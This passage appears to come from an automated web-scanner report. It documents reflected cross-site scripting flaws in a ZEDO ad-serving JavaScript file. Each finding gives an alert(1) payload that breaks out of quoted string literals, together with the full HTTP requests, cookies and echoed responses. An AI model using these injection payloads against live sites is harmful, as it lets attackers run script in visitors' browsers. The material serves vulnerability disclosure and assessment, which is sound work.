if(typeof zzStr=='undefined'){
var zzStr="q=12402';alert(1)//5f92dac5487;z="+Math.random();}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411';

var zzhasAd=undefined;



...[SNIP]...

1.155. http://d7.zedo.com/bar/v16-401/d3/jsc/fmr.js [$ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-401/d3/jsc/fmr.js

Issue detail

The value of the $ request parameter is copied unescaped into the single-quoted JavaScript string literal assigned to zzPat. The payload bef81'%3balert(1)//7636571d18a was submitted in the $ parameter and was echoed as bef81';alert(1)//7636571d18a in the application's response: the quote closes the literal, the semicolon ends the statement, alert(1) runs when the script is loaded, and the trailing // comments out the remainder of the line. Note that the same raw value is also written back to the client in the FFpb cookie (see the Set-Cookie header in the response below).

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bar/v16-401/d3/jsc/fmr.js?c=1&a=0&f=&n=1120&r=13&d=9&q=&$=bef81'%3balert(1)//7636571d18a&s=1&z=0.5481068452354521 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech;alias=legacy.legacy.home.300x250.2.1;target=_blank;grp=1473244827;misc=2328660423
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; __qca=P0-2130372027-1295906131971; ZEDOIDX=29; FFAbh=766B305,20|320_1#365; ZFFAbh=749B826,20|1643_1#382Z1483_768#365; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640:1025,196206,196207,95694|1,24,1:0,40,1:0,40,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1:0,40,1:0,42,3:0,40,1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792:1190,2#684982,1#751890#675823#675820:1025,1#775786#834321#775734#775797#775796#834305#834300#835846#883311#835844#883313#835850:1120,1#619977|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1:0,36,1:0,38,3:0,36,1:0,36,1:0,40,1:0,41,2:0,40,1:0,40,1:0,40,1:0,41,2:0,41,2:2,40,1:0,40,1:2,40,1:0,40,1:3,40,1:0,41,1; FFgeo=5386156; PI=h884566Za747317Zc305004506%2C305004506Zs916Zt143; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1120:bef81';alert(1)//7636571d18a;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1120,1,9;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792:1190,2#684982,1#751890#675823#675820:1025,1#775786#834321#775734#775797#775796#834305#834300#835846#883311#835844#883313#835850:1120,1#619977|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1:0,36,1:0,38,3:0,36,1:0,36,1:0,40,1:0,41,2:0,40,1:0,40,1:0,40,1:0,41,2:0,41,2:2,40,1:0,40,1:2,40,1:0,40,1:3,40,1:0,42,1;expires=Wed, 16 Mar 2011 01:15:00 GMT;path=/;domain=.zedo.com;
ETag: "812b9fe7-809a-4989a59833840"
Vary: Accept-Encoding
X-Varnish: 2233582316
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=60
Expires: Mon, 14 Feb 2011 01:16:00 GMT
Date: Mon, 14 Feb 2011 01:15:00 GMT
Connection: close
Content-Length: 2119

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat=',bef81';alert(1)//7636571d18a';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=,bef81';alert(1)//7636571d18a;z="+Math.random();}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411';

var zzhasAd=undefined;



...[SNIP]...

1.156. http://d7.zedo.com/bar/v16-401/d3/jsc/fmr.js [$ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-401/d3/jsc/fmr.js

Issue detail

The value of the $ request parameter is also copied unescaped into the double-quoted JavaScript string literal assigned to zzStr. The payload 20c48"%3balert(1)//9211c166c4e was submitted in the $ parameter and was echoed as 20c48";alert(1)//9211c166c4e in the application's response. Taken together with 1.155, the value lands in one single-quoted and one double-quoted literal, so a payload using either quote character breaks out of a string; the raw value is again written into the FFpb cookie as well.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bar/v16-401/d3/jsc/fmr.js?c=1&a=0&f=&n=1120&r=13&d=9&q=&$=20c48"%3balert(1)//9211c166c4e&s=1&z=0.5481068452354521 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech;alias=legacy.legacy.home.300x250.2.1;target=_blank;grp=1473244827;misc=2328660423
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; __qca=P0-2130372027-1295906131971; ZEDOIDX=29; FFAbh=766B305,20|320_1#365; ZFFAbh=749B826,20|1643_1#382Z1483_768#365; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640:1025,196206,196207,95694|1,24,1:0,40,1:0,40,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1:0,40,1:0,42,3:0,40,1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792:1190,2#684982,1#751890#675823#675820:1025,1#775786#834321#775734#775797#775796#834305#834300#835846#883311#835844#883313#835850:1120,1#619977|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1:0,36,1:0,38,3:0,36,1:0,36,1:0,40,1:0,41,2:0,40,1:0,40,1:0,40,1:0,41,2:0,41,2:2,40,1:0,40,1:2,40,1:0,40,1:3,40,1:0,41,1; FFgeo=5386156; PI=h884566Za747317Zc305004506%2C305004506Zs916Zt143; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1120:20c48";alert(1)//9211c166c4e;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1120,1,9;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792:1190,2#684982,1#751890#675823#675820:1025,1#775786#834321#775734#775797#775796#834305#834300#835846#883311#835844#883313#835850:1120,1#619977|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1:0,36,1:0,38,3:0,36,1:0,36,1:0,40,1:0,41,2:0,40,1:0,40,1:0,40,1:0,41,2:0,41,2:2,40,1:0,40,1:2,40,1:0,40,1:3,40,1:0,42,1;expires=Wed, 16 Mar 2011 01:14:59 GMT;path=/;domain=.zedo.com;
ETag: "812b9fe7-809a-4989a59833840"
Vary: Accept-Encoding
X-Varnish: 2233582316
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=60
Expires: Mon, 14 Feb 2011 01:15:59 GMT
Date: Mon, 14 Feb 2011 01:14:59 GMT
Connection: close
Content-Length: 2119

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat=',20c48";alert(1)//9211c166c4e';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=,20c48";alert(1)//9211c166c4e;z="+Math.random();}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411';

var zzhasAd=undefined;


                                               var zzStr = "s=1;u=INmz6woBADYAAHrQ5V4A
...[SNIP]...

1.157. http://d7.zedo.com/bar/v16-401/d3/jsc/fmr.js [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-401/d3/jsc/fmr.js

Issue detail

The name of an arbitrarily supplied request parameter is copied into the single-quoted JavaScript string literal assigned to p9.src (the ERR.gif error-beacon URL, where the whole query string is reflected after qs=). The payload 79b5f'-alert(1)-'606f1eb024 was submitted as the parameter name and was echoed unmodified in the application's response. The '-alert(1)-' form closes the literal, evaluates alert(1) as part of a subtraction expression and reopens the literal, so the line remains syntactically valid and the alert fires when the script is loaded.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bar/v16-401/d3/jsc/fmr.js?79b5f'-alert(1)-'606f1eb024=1 HTTP/1.1
Host: d7.zedo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; FFgeo=5386156; ZCBC=1; ZEDOIDX=29; PI=h884566Za747317Zc305004506%2C305004506Zs916Zt143; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792:1190,2#684982,1#751890#675823#675820:1025,1#775786#834321#775734#775797#775796#834305#834300#835846#883311#835844#883313#835850:1120,1#619977|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1:0,36,1:0,38,3:0,36,1:0,36,1:0,40,1:0,41,2:0,40,1:0,40,1:0,40,1:0,41,2:0,41,2:2,40,1:0,40,1:2,40,1:0,40,1:3,40,1:0,42,1; FFcat=1120,1,9; ZFFAbh=749B826,20|1643_1#382Z1483_768#365; FFAbh=766B305,20|320_1#365; FFad=0; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640:1025,196206,196207,95694|1,24,1:0,40,1:0,40,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1:0,40,1:0,42,3:0,40,1; __qca=P0-2130372027-1295906131971;

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 941
Content-Type: application/x-javascript
Set-Cookie: FFad=0:0;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=0,0,0:1120,1,9;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "812b9fe7-809a-4989a59833840"
X-Varnish: 2233582316
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=37
Expires: Mon, 14 Feb 2011 01:26:34 GMT
Date: Mon, 14 Feb 2011 01:25:57 GMT
Connection: close

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

p9.src='http://r1.zedo.com/ads2/p/'+Math.random()+'/ERR.gif?v=bar/v16-401/d3;referrer='+document.referrer+';tag=d7.zedo.com/bar/v16-401/d3/jsc/fmr.js;qs=79b5f'-alert(1)-'606f1eb024=1;';

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=0;var zzPat='';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=;z="+Math.random();}

if(
...[SNIP]...

1.158. http://d7.zedo.com/bar/v16-401/d3/jsc/fmr.js [q parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-401/d3/jsc/fmr.js

Issue detail

The value of the q request parameter is copied unescaped into the single-quoted JavaScript string literal assigned to zzPat. The payload 5c98b'%3balert(1)//05ebf60c76b was submitted in the q parameter and was echoed as 5c98b';alert(1)//05ebf60c76b in the application's response, closing the literal and leaving alert(1) as a free-standing statement.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bar/v16-401/d3/jsc/fmr.js?c=1&a=0&f=&n=1120&r=13&d=9&q=5c98b'%3balert(1)//05ebf60c76b&$=&s=1&z=0.5481068452354521 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech;alias=legacy.legacy.home.300x250.2.1;target=_blank;grp=1473244827;misc=2328660423
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; __qca=P0-2130372027-1295906131971; ZEDOIDX=29; FFAbh=766B305,20|320_1#365; ZFFAbh=749B826,20|1643_1#382Z1483_768#365; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640:1025,196206,196207,95694|1,24,1:0,40,1:0,40,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1:0,40,1:0,42,3:0,40,1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792:1190,2#684982,1#751890#675823#675820:1025,1#775786#834321#775734#775797#775796#834305#834300#835846#883311#835844#883313#835850:1120,1#619977|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1:0,36,1:0,38,3:0,36,1:0,36,1:0,40,1:0,41,2:0,40,1:0,40,1:0,40,1:0,41,2:0,41,2:2,40,1:0,40,1:2,40,1:0,40,1:3,40,1:0,41,1; FFgeo=5386156; PI=h884566Za747317Zc305004506%2C305004506Zs916Zt143; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792:1190,2#684982,1#751890#675823#675820:1025,1#775786#834321#775734#775797#775796#834305#834300#835846#883311#835844#883313#835850:1120,1#619977|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1:0,36,1:0,38,3:0,36,1:0,36,1:0,40,1:0,41,2:0,40,1:0,40,1:0,40,1:0,41,2:0,41,2:2,40,1:0,40,1:2,40,1:0,40,1:3,40,1:0,42,1;expires=Wed, 16 Mar 2011 01:14:56 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=1120,1,9;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "812b9fe7-809a-4989a59833840"
Vary: Accept-Encoding
X-Varnish: 2233582316
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=63
Expires: Mon, 14 Feb 2011 01:15:59 GMT
Date: Mon, 14 Feb 2011 01:14:56 GMT
Connection: close
Content-Length: 2116

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat='5c98b';alert(1)//05ebf60c76b';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=5c98b';alert(1)//05ebf60c76b;z="+Math.random();}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411';

var zzhasAd=undefined;



...[SNIP]...

1.159. http://d7.zedo.com/bar/v16-401/d3/jsc/fmr.js [q parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-401/d3/jsc/fmr.js

Issue detail

The value of the q request parameter is also copied unescaped into the double-quoted JavaScript string literal assigned to zzStr. The payload 4a24e"%3balert(1)//78bd77ef7b2 was submitted in the q parameter and was echoed as 4a24e";alert(1)//78bd77ef7b2 in the application's response. As with the $ parameter (1.155 and 1.156), q reaches both a single-quoted and a double-quoted literal, so neither quote style is safe.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bar/v16-401/d3/jsc/fmr.js?c=1&a=0&f=&n=1120&r=13&d=9&q=4a24e"%3balert(1)//78bd77ef7b2&$=&s=1&z=0.5481068452354521 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech;alias=legacy.legacy.home.300x250.2.1;target=_blank;grp=1473244827;misc=2328660423
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; __qca=P0-2130372027-1295906131971; ZEDOIDX=29; FFAbh=766B305,20|320_1#365; ZFFAbh=749B826,20|1643_1#382Z1483_768#365; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640:1025,196206,196207,95694|1,24,1:0,40,1:0,40,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1:0,40,1:0,42,3:0,40,1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792:1190,2#684982,1#751890#675823#675820:1025,1#775786#834321#775734#775797#775796#834305#834300#835846#883311#835844#883313#835850:1120,1#619977|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1:0,36,1:0,38,3:0,36,1:0,36,1:0,40,1:0,41,2:0,40,1:0,40,1:0,40,1:0,41,2:0,41,2:2,40,1:0,40,1:2,40,1:0,40,1:3,40,1:0,41,1; FFgeo=5386156; PI=h884566Za747317Zc305004506%2C305004506Zs916Zt143; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792:1190,2#684982,1#751890#675823#675820:1025,1#775786#834321#775734#775797#775796#834305#834300#835846#883311#835844#883313#835850:1120,1#619977|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1:0,36,1:0,38,3:0,36,1:0,36,1:0,40,1:0,41,2:0,40,1:0,40,1:0,40,1:0,41,2:0,41,2:2,40,1:0,40,1:2,40,1:0,40,1:3,40,1:0,42,1;expires=Wed, 16 Mar 2011 01:14:56 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=1120,1,9;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "812b9fe7-809a-4989a59833840"
Vary: Accept-Encoding
X-Varnish: 2233582316
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=63
Expires: Mon, 14 Feb 2011 01:15:59 GMT
Date: Mon, 14 Feb 2011 01:14:56 GMT
Connection: close
Content-Length: 2116

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat='4a24e";alert(1)//78bd77ef7b2';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=4a24e";alert(1)//78bd77ef7b2;z="+Math.random();}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411';

var zzhasAd=undefined;


                                               var zzStr = "s=1;u=INmz6woBADYAAHrQ5V4A
...[SNIP]...
